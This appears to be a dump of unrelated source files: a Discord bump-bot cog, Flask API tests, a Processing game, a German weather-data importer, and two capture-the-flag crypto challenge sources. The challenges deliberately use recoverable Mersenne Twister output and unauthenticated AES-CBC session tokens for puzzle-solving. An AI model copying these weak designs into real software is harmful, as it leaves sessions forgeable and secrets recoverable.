loc='upper right')
plt.title('Masked line demo')
plt.show()
| 26.586207 | 125 | 0.674449 |
c64083cdbb6bc51279e8d61f14f8bb6353a1ec31
| 8,600 |
py
|
Python
|
cogs/setup.py
|
zImPinguin/Bump-Bot
|
3f449a4e5581a35a5cff998e94a13ae33dbe2b04
|
[
"MIT"
] | 1 |
2021-09-03T15:14:40.000Z
|
2021-09-03T15:14:40.000Z
|
cogs/setup.py
|
zImPinguin/Bump-Bot
|
3f449a4e5581a35a5cff998e94a13ae33dbe2b04
|
[
"MIT"
] | 1 |
2022-01-02T15:18:08.000Z
|
2022-02-14T12:46:20.000Z
|
cogs/setup.py
|
zImPinguin/Bump-Bot
|
3f449a4e5581a35a5cff998e94a13ae33dbe2b04
|
[
"MIT"
] | null | null | null |
import discord, asyncio
from core.database import Servers
from core.embeds import Embeds
from core.files import Data
commands = discord.ext.commands
class BumpSetup(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.config = Data("config").yaml_read()
self.settings = Data("settings").json_read()
global setting_up
setting_up = []
@commands.Cog.listener('on_guild_remove')
async def remove_guild(self, guild):
Servers(guild.id).delete()
@commands.guild_only()
@commands.has_permissions(manage_guild=True)
@commands.check(lambda ctx: ctx.guild not in setting_up)
@commands.command()
async def setup(self, ctx):
guild = ctx.guild
prefix = Servers(guild.id).getPrefix() if Servers(guild.id).hasPrefix else self.config["prefix"]
if Servers(guild.id).get():
return await ctx.send(embed=Embeds(f"Der Server ist schon aufgesetzt benutze `{prefix}delete` um das setup erneut zu starten!").error())
embed = discord.Embed(
title="🔄 Setting Up...",
color=discord.Color.green()
)
embed.set_author(name=str(ctx.author), icon_url=ctx.author.avatar_url_as(static_format="png"))
embed.description = "Gebe deine Server Beschreibung ein sie muss zwischen 10-2408 Zeichen hab.!"
await ctx.send(embed=embed)
try:
description = (await self.bot.wait_for(
'message',
timeout=120,
check=lambda message: message.author.id == ctx.author.id and len(message.content) and message.channel.id == ctx.channel.id
)).content
if len(description) > 2048:
return await ctx.send(embed=Embeds("Setup abgebrochen deine Beschreibung ist zu lang!").error())
elif len(description) < 10:
return await ctx.send(embed=Embeds("Setup abgebrochen deine Beschreibung ist zu kurz!").error())
except asyncio.TimeoutError:
return await ctx.send(embed=Embeds("Setup abgebrochen, Zeit zuende!").error())
embed.description = "Gebe den Channel an indem der Invite sein soll!"
await ctx.send(embed=embed)
try:
invite = await commands.TextChannelConverter().convert(ctx, (await self.bot.wait_for(
'message',
timeout=120,
check=lambda message: message.author.id == ctx.author.id and len(message.content) and message.channel.id == ctx.channel.id
)).content)
if not invite.permissions_for(ctx.me).create_instant_invite:
return await ctx.send(embed=Embeds("Setup abgebrochen ich habe keine Permissions einen Invite zu erstellen.!").error())
except asyncio.TimeoutError:
return await ctx.send(embed=Embeds("Setup abgebrochen!").error())
except commands.ChannelNotFound:
return await ctx.send(embed=Embeds("Setup abgebrochen, channel wurde nicht gefunden!").error())
embed.description = "Gebe den Channel an wo die Bumps gesendet werden sollen, der Bot brauch Manage Webhooks permissions.!"
await ctx.send(embed=embed)
try:
listing = await commands.TextChannelConverter().convert(ctx, (await self.bot.wait_for(
'message',
timeout=120,
check=lambda message: message.author.id == ctx.author.id and len(message.content) and message.channel.id == ctx.channel.id
)).content)
if not listing.permissions_for(ctx.me).manage_webhooks:
return await ctx.send(embed=Embeds("Setup abgebrochen mir fehlt die Permission Manage Webhooks!").error())
except asyncio.TimeoutError:
return await ctx.send(embed=Embeds("Setup abgebrochen, Zeit zuende!").error())
except commands.ChannelNotFound:
return await ctx.send(embed=Embeds("Setup abgebrochen, Channel nicht gefunden!").error())
embed.description = "Gebe eine Farbe für deinen Bump an: `HEX` !"
await ctx.send(embed=embed)
try:
color = int((await self.bot.wait_for(
'message',
timeout=120,
check=lambda message: message.author.id == ctx.author.id and len(message.content) and message.channel.id == ctx.channel.id
)).content.replace("#", ""), 16)
except asyncio.TimeoutError:
return await ctx.send(embed=Embeds("Setup abgebrochen, Zeit zuende!").error())
except ValueError:
return await ctx.send(embed=Embeds("Setup abgebrochen, die Farbe gibt es nicht!").error())
webhook = await listing.create_webhook(name=self.config['bot_name'])
Servers(ctx.guild.id).add(webhook=webhook.id, invite=invite.id, color=color, description=description, icon_url=str(ctx.guild.icon_url_as(static_format="png")), server_name=ctx.guild.name)
return await ctx.send(embed=discord.Embed(
title="👌 Setup Beendet",
description="Dein Server wurde in die Datenbenk eingetragen.",
color=discord.Color.green()
))
@commands.guild_only()
@commands.has_permissions(manage_guild=True)
@commands.check(lambda ctx: ctx.guild not in setting_up)
@commands.command()
async def delete(self, ctx):
if not Servers(ctx.guild.id).get():
return await ctx.send(embed=Embeds("Der Server hat keine Daten in unserer Datenbank!").error())
confirmation_message = await ctx.send(embed=discord.Embed(
title=" ⚠️Willst du das wirklich machen?⚠️",
description=f"**{ctx.author}**,Du willst dein Server aus der Datenbank löschen,bist du dir Sicher.",
color=discord.Color.orange()
))
emojis = ["✅", "❎"]
for emoji in emojis: await confirmation_message.add_reaction(emoji)
try:
reaction, user = await self.bot.wait_for(
'reaction_add',
timeout=120,
check=lambda r, u: r.emoji in emojis and r.message.id == confirmation_message.id and u.id == ctx.author.id
)
except asyncio.TimeoutError:
await ctx.send(embed=Embeds("Server wurde nicht gelöscht, da die Zeit abgelaufen ist!").error())
return await confirmation_message.delete()
if reaction.emoji == emojis[1]:
return await ctx.send(embed=Embeds("Serverlöschung gestoppt.").error())
db_entry = Servers(ctx.guild.id)
cache_data = db_entry.get()
db_entry.delete()
setting_up.remove(ctx.guild)
del_message = await ctx.send(embed=discord.Embed(
title="🗑️ Server gelöscht",
description="Der Server wurde aus der Datenbank gelöscht, Du hast eine Minute Zeit um das rückgängig zu machen.",
color=discord.Color.green()
))
await del_message.add_reaction("♻️")
try:
await self.bot.wait_for(
'reaction_add',
timeout=60,
check=lambda r,u: r.emoji == "♻️" and r.message.id == del_message.id and u.id == ctx.author.id
)
except asyncio.TimeoutError:
try:
wh = await self.bot.fetch_webhook(cache_data['webhook'])
await wh.delete()
except:
pass
return await del_message.remove_reaction("♻️", self.bot.user)
if Servers(ctx.guild.id).get():
try:
wh = await self.bot.fetch_webhook(cache_data['webhook'])
await wh.delete()
except:
pass
return await ctx.send(embed=discord.Embed(
title="❎ Restoren des Servers nicht möglich",
description="Du musst deinen Server nochmal setupen mit =setup",
color=discord.Color.red()
))
Servers(ctx.guild.id).add(**cache_data)
return await ctx.send(embed=discord.Embed(
title="♻️ Server Restored",
description="Dein Server wurde wieder hergestellt.",
color=discord.Color.green()
))
@setup.before_invoke
@delete.before_invoke
async def add_to_setting_up(self, ctx):
setting_up.append(ctx.guild)
@setup.after_invoke
@delete.after_invoke
async def remove_from_setting_up(self, ctx):
try:
setting_up.remove(ctx.guild)
except: pass
def setup(bot):
bot.add_cog(BumpSetup(bot))
| 41.95122 | 195 | 0.614767 |
0680715fb87395cc84968553ece1b783529d1128
| 136 |
py
|
Python
|
apps.py
|
klml/kohrsupply
|
89ae3ebae120398e8259dbe77c3b092485cc79f9
|
[
"MIT"
] | null | null | null |
apps.py
|
klml/kohrsupply
|
89ae3ebae120398e8259dbe77c3b092485cc79f9
|
[
"MIT"
] | 9 |
2017-06-15T10:24:09.000Z
|
2018-08-01T21:07:25.000Z
|
apps.py
|
klml/kohrsupply
|
89ae3ebae120398e8259dbe77c3b092485cc79f9
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from django.apps import AppConfig
class kohrsupplyConfig(AppConfig):
name = 'kohrsupply'
| 17 | 39 | 0.801471 |
00375be90a613ab5cd6043f22cb4deaf1382f7a4
| 346 |
py
|
Python
|
Chapter9_Packages/1_Packages/code.py
|
kernbeisser/UdemyPythonPro
|
000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9
|
[
"MIT"
] | 4 |
2020-12-28T23:43:35.000Z
|
2022-01-01T18:34:18.000Z
|
Chapter9_Packages/1_Packages/code.py
|
kernbeisser/UdemyPythonPro
|
000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9
|
[
"MIT"
] | null | null | null |
Chapter9_Packages/1_Packages/code.py
|
kernbeisser/UdemyPythonPro
|
000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9
|
[
"MIT"
] | 9 |
2020-09-26T19:29:28.000Z
|
2022-02-07T06:41:00.000Z
|
from my_package.calculations import addition
from my_package.calculations import division
from my_package.calculations import multiplication
from my_package.calculations import subtraction
from my_package.printing import hello_world
hello_world()
print(addition(1, 2))
print(subtraction(1, 2))
print(multiplication(1, 2))
print(division(1, 2))
| 26.615385 | 50 | 0.83237 |
cc4035011dbf1192d4cd94b47116fc9d567354e8
| 4,748 |
py
|
Python
|
src/unittest/python/GK/test_crud.py
|
mfentler-tgm/sew5-simple-user-database-mfentler-tgm
|
98fba2cdca4243c3b2f25c45ceb043c258a5db53
|
[
"MIT"
] | null | null | null |
src/unittest/python/GK/test_crud.py
|
mfentler-tgm/sew5-simple-user-database-mfentler-tgm
|
98fba2cdca4243c3b2f25c45ceb043c258a5db53
|
[
"MIT"
] | null | null | null |
src/unittest/python/GK/test_crud.py
|
mfentler-tgm/sew5-simple-user-database-mfentler-tgm
|
98fba2cdca4243c3b2f25c45ceb043c258a5db53
|
[
"MIT"
] | null | null | null |
import pytest
import json
from server.server import app, db
import re
from server.databaseHandler import createDBAndAdminUser,login
userCounter = 0
@pytest.fixture
def client():
'''
This method is like the @setup Method. It gets called before every test.
:return: Returns a REST interface which is used by the test methods.
'''
print('\n----- CREATE FLASK APPLICATION\n')
test_client = app.test_client()
app.secret_key = "super secret key"
createDBAndAdminUser()
global userCounter
userCounter = 0
yield test_client
db.drop_all()
def countUser(client):
'''
This Method overwrites the global variable userCounter which is used in the test methods.
:param client: is the Flask test_client.
'''
result = login(client,"get",url='/user')
json_data = json.loads(result.data)
global userCounter
for item in json_data:
userCounter += 1
def test_noAuth(client):
response = client.get('/user')
assert (response.status_code == 401)
def test_digest_auth_prompt(client):
response = client.get('/user')
assert(response.status_code == 401)
assert('WWW-Authenticate' in response.headers)
assert(re.match(r'^Digest realm="Authentication Required",'
r'nonce="[0-9a-f]+",opaque="[0-9a-f]+"$',
response.headers['WWW-Authenticate']))
def test_post_user(client):
'''
This Method is testing the post method.
:param client: is the Flask test_client
'''
print('\n----- TESTING POST USER\n')
json_dict = {"email": "[email protected]", "username": "testuser", "password": "testpw",
"picture": "linkZumBild"}
response = login(client, "post", json_dict)
assert response.status_code == 200
def test_post_user_notAllArgs(client):
'''
This Method tests to post a new user without giving every arg.
:param client: Is the Flask test_client.
'''
print('\n----- TESTING POST USER WITH NOT ALL ARGS GIVEN\n')
json_dict = {"username": "testuser", "picture": "linkZumBild"}
response = login(client, "post", json_dict)
assert ValueError
assert response.status_code == 500
def test_post_user_userExists(client):
'''
This Method tests to post a new user without giving every arg.
:param client: Is the Flask test_client.
'''
print('\n----- TESTING POST USER with existing data\n')
json_dict = {"email": "[email protected]", "username": "testuser", "password": "testpw", "picture": "linkZumBild"}
response = login(client, "post", json_dict)
json_dict = {"email": "[email protected]", "username": "testuser", "password": "testpw", "picture": "linkZumBild"}
response = login(client, "post", json_dict)
assert ValueError
def test_get_user(client):
'''
This Method tests the GET Method.
:param client: Is the Flask test_client.
'''
print('\n--- TESTING GET USER\n')
countUser(client)
url = '/user/' + str(userCounter)
response = login(client, "get", url=url)
json_data = json.loads(response.data)
assert 'id' in json_data
assert '[email protected]' in json_data['email']
assert 'admin' in json_data['username']
def test_put_user(client):
'''
This Method updates a user and tests if the updates took place.
:param client: Is the Flask test_client
'''
print('\n--- TESTING PUT USER\n')
json_dict = {"email": "[email protected]", "username": "testuser", "password": "testpw",
"picture": "linkZumBild"}
login(client, "post", json_dict)
countUser(client)
url = '/user/' + str(userCounter)
json_dict2 = {"email": "Neue Email", "username": "testuser"}
response = login(client, "put", url=url, json_dict=json_dict2)
assert response.status_code == 200
response = login(client, "get", url=url)
json_data = json.loads(response.data)
assert 'Neue Email' in json_data['email']
def test_delete_user(client):
'''
This Methods deletes the last added user and tests if it is still there.
:param client: is the Flask test_client.
'''
print('\n--- TESTING DELETE USER\n')
json_dict = {"email": "[email protected]", "username": "testuser", "password": "testpw",
"picture": "linkZumBild"}
login(client, "post", json_dict)
countUser(client)
url = '/user/' + str(userCounter)
response = login(client,"delete",url=url)
assert response.status_code == 200
#Test if user is still in the db
response = login(client,"get")
json_data = json.loads(response.data)
for user in json_data:
assert 'testuser' not in user['username']
| 27.766082 | 127 | 0.648062 |
aead4bc57a94d6059889b3eb06930efa48c66de6
| 429 |
py
|
Python
|
Zh3r0/2021/crypto/twist_and_shout/challenge.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | 1 |
2021-11-02T20:53:58.000Z
|
2021-11-02T20:53:58.000Z
|
Zh3r0/2021/crypto/twist_and_shout/challenge.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
Zh3r0/2021/crypto/twist_and_shout/challenge.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
from secret import flag
import os
import random
state_len = 624*4
right_pad = random.randint(0,state_len-len(flag))
left_pad = state_len-len(flag)-right_pad
state_bytes = os.urandom(left_pad)+flag+os.urandom(right_pad)
state = tuple( int.from_bytes(state_bytes[i:i+4],'big') for i in range(0,state_len,4) )
random.setstate((3,state+(624,),None))
outputs = [random.getrandbits(32) for i in range(624)]
print(*outputs,sep='\n')
| 28.6 | 87 | 0.745921 |
aec17c9e87a24b9ff7c00abc71f18927344b7a30
| 2,377 |
pyde
|
Python
|
sketches/hero01/hero01.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 4 |
2018-06-03T02:11:46.000Z
|
2021-08-18T19:55:15.000Z
|
sketches/hero01/hero01.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | null | null | null |
sketches/hero01/hero01.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 3 |
2019-12-23T19:12:51.000Z
|
2021-04-30T14:00:31.000Z
|
# Hero 01
from sprites3 import Hero, Orc, Obstacle
tilesize = 32
terrain = [[0,0,0,0,0,0,8,0,0,0,0,0,0,0,0,0,0,0,0,7],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,7,7],
[0,0,0,0,0,8,0,0,0,0,0,0,0,0,0,0,0,0,0,7],
[0,0,0,0,0,8,8,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,6,6],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,6,6,0],
[0,0,0,0,0,0,0,0,0,0,8,0,0,0,0,6,6,6,0,0],
[6,9,0,9,9,0,0,0,0,0,0,0,8,0,0,0,0,0,0,0],
[9,6,9,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[6,6,6,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
hero = Hero(16*tilesize, 0)
orc = Orc(4*tilesize, 0)
obstacles = []
def setup():
global bg
bg = loadImage("terrain.png")
loadObstaclesData()
frameRate(30)
size(640, 320)
hero.loadPics()
orc.loadPics()
hero.dx = 2
hero.dy = 2
orc.dx = 2
orc.dy = 2
def draw():
background(bg)
hero.move()
for i in range(len(obstacles)):
if hero.checkCollision(obstacles[i]):
if hero.dir == 0:
hero.x -= hero.dx
elif hero.dir == 1:
hero.y -= hero.dy
elif hero.dir == 2:
hero.x += hero.dx
elif hero.dir == 3:
hero.y += hero.dy
hero.image1 = hero.image2
hero.display()
orc.move()
for i in range(len(obstacles)):
if orc.checkCollision(obstacles[i]):
if orc.dir == 0:
orc.x -= orc.dx
orc.dir = int(random(4))
elif hero.dir == 1:
orc.y -= orc.dy
orc.dir = int(random(4))
elif hero.dir == 2:
orc.x += orc.dx
orc.dir = int(random(4))
elif hero.dir == 3:
orc.y += orc.dy
orc.dir = int(random(4))
orc.image1 = orc.image2
orc.display()
def keyPressed():
if keyPressed and key == CODED:
if keyCode == RIGHT:
hero.dir = 0
elif keyCode == DOWN:
hero.dir = 1
elif keyCode == LEFT:
hero.dir = 2
elif keyCode == UP:
hero.dir = 3
def loadObstaclesData():
for y in range(10):
for x in range(20):
if terrain[y][x] > 5:
obstacles.append(Obstacle(x*tilesize, y*tilesize))
| 29.345679 | 66 | 0.454775 |
c9fb0f8ebbd0b19751210ef3bd1d1790555c3ab4
| 7,877 |
py
|
Python
|
DWD_hist_weather.py
|
TrismegistusS/DWD_historical_weather
|
6a903feea98bdd028ad58dd6d8856f706b328e7b
|
[
"MIT"
] | 1 |
2021-06-01T10:30:00.000Z
|
2021-06-01T10:30:00.000Z
|
DWD_hist_weather.py
|
TrismegistusS/DWD_historical_weather
|
6a903feea98bdd028ad58dd6d8856f706b328e7b
|
[
"MIT"
] | null | null | null |
DWD_hist_weather.py
|
TrismegistusS/DWD_historical_weather
|
6a903feea98bdd028ad58dd6d8856f706b328e7b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# DWD_hist_weather.py
#
# (c) 2021 Holger Leerhoff
#
# Dieses Modul importiert Daten aus dem umfangreichen OpenData-Angebot
# des Deutschen Wetterdienstes (DWD) in ein Pandas-Dataframe.
#
# Regionalität
#
# Die Auswahl der Wetterstationen erfolgt hier nach Bundesländern. Auf
# Grundlage des Bundeslands werden alle dort befindlichen Wetterstationen
# ermittelt, deren historische und aktuelle Daten heruntergeladen, extrahiert
# und (hier am Beispiel der Temperatur) in ein DataFrame geladen und können
# dann weiter ausgewertet werden.
import numpy as np
import pandas as pd
from bs4 import BeautifulSoup
import requests
from urllib.request import urlopen
from io import BytesIO
from zipfile import ZipFile
import fnmatch
def tageswerte_land(auswertungsland, still=False, protokoll=False):
"""
Parameters
----------
land : Name of federal state (required)
still: suppress progess indicators (optional, default: False)
protokoll: write wetterdaten.csv.gz (optional, default: False)
Returns
-------
Pandas DataFrame with the state's daily average measured values:
- TempMean, HumidityMean, TempMax, TempMin, SunshineDuration
"""
DWD_PFAD = 'https://opendata.dwd.de/climate_environment/CDC/' \
'observations_germany/climate/daily/kl/'
assert auswertungsland in ['Baden-Württemberg', 'Bayern', 'Berlin', 'Brandenburg',
'Bremen', 'Hamburg', 'Hessen', 'Mecklenburg-Vorpommern',
'Niedersachsen', 'Nordrhein-Westfalen', 'Rheinland-Pfalz',
'Saarland', 'Sachsen', 'Sachsen-Anhalt',
'Schleswig-Holstein', 'Thüringen'], 'Bitte Namem eines Bundeslands' \
' als Parameter übergeben.'
# Laden der Wetterstationen vom DWD-OpenData-Server. Infos, Datensatz-
# beschreibung etc. hier: https://opendata.dwd.de/README.txt
url = DWD_PFAD + 'historical/KL_Tageswerte_Beschreibung_Stationen.txt'
stationen = pd.DataFrame()
stationen = pd.read_fwf(url,
encoding='ISO-8859-1',
header=None,
skiprows=[0, 1],
names=['Stations_id', 'von_datum', 'bis_datum',
'Stationshoehe', 'geoBreite', 'geoLaenge',
'Stationsname', 'Bundesland'])
# Aus dem Datensatz alle Stations-IDs nach Ländern extrahieren und als
# separate Listen mit den Ländernamen als Schlüssel in dictionary packen.
stationen_ids = {}
for land in stationen['Bundesland'].unique():
stationen_ids[land] = stationen[stationen['Bundesland']
== land]['Stations_id'].tolist()
# Zusammenstellen der URLs der ZIP-Archive der Wetterstationen vom
# DWD-OpenData-Server. Aufrufen der html-Seite, parsen mit BeautifulSoup,
# die entsprechenden URLs in einer Liste speichern.
stationen_dateinamen = {}
page = requests.get(DWD_PFAD+'historical').text
soup = BeautifulSoup(page, 'html.parser')
for node in soup.find_all('a'):
if node.get('href').startswith('tageswerte_KL_'):
stationen_dateinamen[int(node.text[14:19])] = node.text
# Die Wetterdaten ausgewählter Wetterstationen (als ZIP-Archiv) vom
# DWD-OpenData-Server ziehen, darin die eigentliche Datendatei finden und
# deren Inhalte einlesen.
# Zu allen Wetterstationen eine Datei mit aktuellen Wetterdaten suchen und
# deren Inhalte einlesen.
# Error-Handling für Stationen ohne freie / akt. Daten.
# Hier werden ausgelesen:
# - das Tagesmittel der Temperatur in °C (TMK)
# - das Tagesmittel der relativen Feuchte in % (UPM)
# - das Tagesmaximum der Temeratur in 2m Höhe in °C (TXK)
# - das Tagesminimum der Temeratur in 2m Höhe in °C (TNK)
# - die tägliche Sonnenscheindauer in h (SDK)
# - das Tagesmittel der Windgeschwindigkeit im m/s
# Im Datensatz sind noch weitere Messwerte vorhanden.
wetter = pd.DataFrame()
for station in stationen_ids[auswertungsland]:
for typ in ['historical', 'recent']:
try:
if typ == 'historical':
url = DWD_PFAD+'historical/'+stationen_dateinamen[station]
else:
url = DWD_PFAD+'recent/tageswerte_KL_' + \
str(station).zfill(5)+'_akt.zip'
gezippte_dateien = ZipFile(BytesIO(urlopen(url).read()))
csv_dateiname = (fnmatch.filter(gezippte_dateien.namelist(),
'produkt*.txt'))
csv_daten = gezippte_dateien.open(*csv_dateiname)
wetter = wetter.append(pd.read_csv(csv_daten,
sep=';',
usecols=['STATIONS_ID',
'MESS_DATUM',
' TMK',
' UPM',
' TXK',
' TNK',
' SDK',
' FM'],
parse_dates=['MESS_DATUM']))
if not still:
print('.', end='')
except KeyError: # für die Wetterstation liegen keine Daten vor
if not still:
print('-', end='')
except IOError: # für die Wetterstation liegen keine akt. Daten vor
if not still:
print('-', end='')
# Missings (-999.0) durch System-Missings ersetzen.
wetter = (wetter.rename(columns={'STATIONS_ID': 'Station',
'MESS_DATUM': 'Datum',
' TMK': 'TempMean',
' UPM': 'HumidityMean',
' TXK': 'TempMax',
' TNK': 'TempMin',
' SDK': 'SunshineDuration',
' FM': 'Windspeed'})
.replace(-999.0, np.nan))
# Protokoll: gegebenenfalls großes DataFrame als komprimiertes csv speichern
if protokoll:
wetter.to_csv('./wetterprotokoll.csv.gz', index=False, compression='gzip')
# Aus Stationsdaten regionale Tagesmittelwerte bilden
tageswerte = wetter[['Datum', 'TempMean', 'HumidityMean', 'TempMax', 'TempMin',
'SunshineDuration', 'Windspeed']].groupby('Datum').mean()
tageswerte['Jahr'] = tageswerte.index.year
tageswerte['Monat'] = tageswerte.index.month
tageswerte['Tag_des_Jahres'] = tageswerte.index.dayofyear
return tageswerte
def tagestemp_land(auswertungsland, still=False): # for backwards compatibility
"""
Parameters
----------
land : Name of federal state (required)
still: suppress progess indicators (optional, default: False)
Returns
-------
Pandas DataFrame with the state's daily average temeratures
"""
tageswerte = tageswerte_land(auswertungsland)
tageswerte = tageswerte[['TempMean', 'Jahr', 'Monat', 'Tag_des_Jahres']]
tageswerte = tageswerte.rename(columns={'TempMean': 'Temp'})
return tageswerte
# beim direkten Aufruf mit Land als Parameter jährlichen Temperaturdurchschnitt ausgeben
if __name__ == "__main__":
import sys
tageswerte = tageswerte_land(sys.argv[1])
print(f'\nJähliche Durchschnittstemperturen für {sys.argv[1]}.')
print(tageswerte.groupby('Jahr')['TempMean'].mean())
| 48.325153 | 89 | 0.573949 |
4ea3a0dcd2c25937127edf1829caf1b7e18a4575
| 139 |
py
|
Python
|
Python/Courses/LearnToCodeInPython3ProgrammingBeginnerToAdvancedYourProgress/python_course/Section3ConditionalsLoopsFunctionsAndABitMore/24ErrorHandling.py
|
JamieBort/LearningDirectory
|
afca79c5f1333c079d0e96202ff44ca21b2ceb81
|
[
"Info-ZIP"
] | 1 |
2022-02-02T21:56:08.000Z
|
2022-02-02T21:56:08.000Z
|
Python/Courses/LearnToCodeInPython3ProgrammingBeginnerToAdvancedYourProgress/python_course/Section3ConditionalsLoopsFunctionsAndABitMore/24ErrorHandling.py
|
JamieBort/LearningDirectory
|
afca79c5f1333c079d0e96202ff44ca21b2ceb81
|
[
"Info-ZIP"
] | 27 |
2020-06-27T23:25:59.000Z
|
2022-02-27T20:40:56.000Z
|
Python/Courses/LearnToCodeInPython3ProgrammingBeginnerToAdvancedYourProgress/python_course/Section3ConditionalsLoopsFunctionsAndABitMore/24ErrorHandling.py
|
JamieBort/LearningDirectory
|
afca79c5f1333c079d0e96202ff44ca21b2ceb81
|
[
"Info-ZIP"
] | null | null | null |
number = input("Type a number: ")
try:
number = float(number)
print("The number is: ", number)
except:
print("Invalid number")
| 19.857143 | 36 | 0.633094 |
1109ae93791128000604ddf124ebeadf105e2846
| 3,562 |
py
|
Python
|
skimind/kernel/pdfManag/extract.py
|
NathBangwa/SkimindFoot
|
8ae3a00074c56dd981fbfdab30e29898ddcaf6be
|
[
"MIT"
] | 1 |
2020-11-13T18:30:47.000Z
|
2020-11-13T18:30:47.000Z
|
skimind/kernel/pdfManag/extract.py
|
nathanbangwa243/SkimindFoot
|
8ae3a00074c56dd981fbfdab30e29898ddcaf6be
|
[
"MIT"
] | 5 |
2020-11-13T18:16:48.000Z
|
2021-09-08T01:04:59.000Z
|
skimind/kernel/pdfManag/extract.py
|
nathanbangwa243/SkimindFoot
|
8ae3a00074c56dd981fbfdab30e29898ddcaf6be
|
[
"MIT"
] | null | null | null |
# excel reader
import xlrd
# system tools
import os
# datetime
import pandas as pd
# regular expression
import re
# copy
import copy
def extract_metadatas(metadatas, is_betfile=True):
"""
suppression du caractere versus
remplacement des donnees vides (-)
transformation des cotes en float
"""
def serialize_data(data, isclass=False):
# lowercase
data = str(data).lower()
# replace comma by fullstop
data = data.replace(",", ".")
# remplacement de -, x par 0
try:
if is_betfile:
data = float(data)
else:
data = int(data)
except:
data = 0
finally:
if isclass:
data = int(data)
return data
def move_datas_bet(cotes):
# copy
new_cotes = copy.deepcopy(cotes)
# --> index des cotes a mover
index_to_move = [1, 4, 7, 10, 13, 22]
#--> arrangement des new_cotes
for index in index_to_move:
new_cotes[index], new_cotes[index + 1] = new_cotes[index + 1], new_cotes[index]
return new_cotes
new_metadatas = copy.deepcopy(metadatas)
for index in range(len(new_metadatas)):
# idmatch
idmatch = new_metadatas[index][0]
idmatch = int(idmatch)
new_metadatas[index][0] = idmatch
# classement_A classement_B
class_a = new_metadatas[index][4]
class_b = new_metadatas[index][6]
new_metadatas[index][4] = serialize_data(class_a, isclass=True)
new_metadatas[index][6] = serialize_data(class_b, isclass=True)
# cote ou resultat
datas = new_metadatas[index][8:]
datas = map(serialize_data, datas)
datas = list(datas)
if is_betfile:
datas = move_datas_bet(datas)
new_metadatas[index][8:] = datas
# deletion of versus symbole
del new_metadatas[index][5]
return new_metadatas
def extract_datas(filename:str):
def is_matchs_datas(tablist):
"""
Verifie si une liste contient les donnees de pari
"""
try:
date = tablist[1].value
date_list = re.findall("\d\d[-/]\d\d[-/]\d{2,4}",date)
if not date_list:
raise ValueError("le tableau ne contient aucune date")
except:
return False
return True
def get_values(tablist):
datas = map(lambda data: data.value, tablist)
datas = list(datas)
return datas
#
workbook = xlrd.open_workbook(filename)
# sheets
sheets = workbook.sheets()
metadatas = list()
for sheet in sheets:
for row in sheet.get_rows():
if is_matchs_datas(row):
# serialisation des donnees
row = get_values(row)
# ajout
metadatas.append(row)
return metadatas
def pdf_process(filename:str, is_betfile=True):
metadata = extract_datas(filename)
metadata = extract_metadatas(metadata, is_betfile=is_betfile)
print(metadata[0:2])
# test
filename = "C:\\Users\\RMB PC\\Downloads\\long.xlsx"
pdf_process(filename)
| 23.281046 | 95 | 0.52667 |
feca8821c2a71890d348d55d6596060b0e8c15af
| 662 |
py
|
Python
|
angstrom/2019/crypto/Secret_Sheep_Society/manager.py
|
mystickev/ctf-archives
|
89e99a5cd5fb6b2923cad3fe1948d3ff78649b4e
|
[
"MIT"
] | 1 |
2021-11-02T20:53:58.000Z
|
2021-11-02T20:53:58.000Z
|
angstrom/2019/crypto/Secret_Sheep_Society/manager.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
angstrom/2019/crypto/Secret_Sheep_Society/manager.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | 1 |
2021-12-19T11:06:24.000Z
|
2021-12-19T11:06:24.000Z
|
import base64
import json
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
class Manager:
BLOCK_SIZE = AES.block_size
def __init__(self, key):
self.key = key
def pack(self, session):
cipher = AES.new(self.key, AES.MODE_CBC)
iv = cipher.iv
dec = json.dumps(session).encode()
enc = cipher.encrypt(pad(dec, self.BLOCK_SIZE))
raw = iv + enc
return base64.b64encode(raw)
def unpack(self, token):
raw = base64.b64decode(token)
iv = raw[:self.BLOCK_SIZE]
enc = raw[self.BLOCK_SIZE:]
cipher = AES.new(self.key, AES.MODE_CBC, iv)
dec = unpad(cipher.decrypt(enc), self.BLOCK_SIZE)
return json.loads(dec.decode())
| 23.642857 | 51 | 0.70997 |
3a2ac405532f3af64dc27adf252a53eab657c4d4
| 3,459 |
py
|
Python
|
pyramid-creator/app/utils/slide_utils.py
|
jinnn-dev/patholearn
|
b4e6a18cfbf963e71640ed6cac3fc3a618a7ae15
|
[
"MIT"
] | 1 |
2021-11-04T17:06:07.000Z
|
2021-11-04T17:06:07.000Z
|
pyramid-creator/app/utils/slide_utils.py
|
JamesNeumann/learning-by-annotations
|
c2b5e4b653eeb1c973aa5a7dad35ac8be18cb1ad
|
[
"MIT"
] | 21 |
2021-11-01T10:13:56.000Z
|
2021-12-02T10:02:13.000Z
|
pyramid-creator/app/utils/slide_utils.py
|
jinnn-dev/patholearn
|
